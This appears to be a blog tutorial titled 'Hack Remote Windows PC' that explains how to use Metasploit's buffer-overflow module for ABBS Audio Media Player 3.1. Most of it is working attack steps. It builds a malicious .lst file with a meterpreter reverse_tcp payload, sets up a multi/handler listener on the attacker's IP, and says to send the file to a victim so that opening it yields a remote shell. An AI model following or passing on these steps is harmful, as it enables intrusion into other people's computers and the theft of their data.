Hack Remote Windows PC using ABBS Audio Media Player .LST Buffer Overflow

This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding an .lst, allowing arbitrary code execution with the privileges of the user running the application. This module has been tested successfully on ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.

Exploit Targets
ABBS Audio Media Player 3.1

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open Kali Linux terminal type msfconsole


Now type use exploit/windows/fileformat/abbs_amp_ lst
msf exploit (abbs_amp_ lst)>set payload windows/meterpreter/reverse_tcp
msf exploit (abbs_amp_ lst)>set lhost 192.168.1.115 (IP of Local Host)
msf exploit (abbs_amp_ lst)>exploit  


After we successfully generate the malicious lst File, it will stored on your local computer
/root/.msf4/local/msf.lst


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.115
exploit

Now send your msf. lst files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


0 comments:

Post a Comment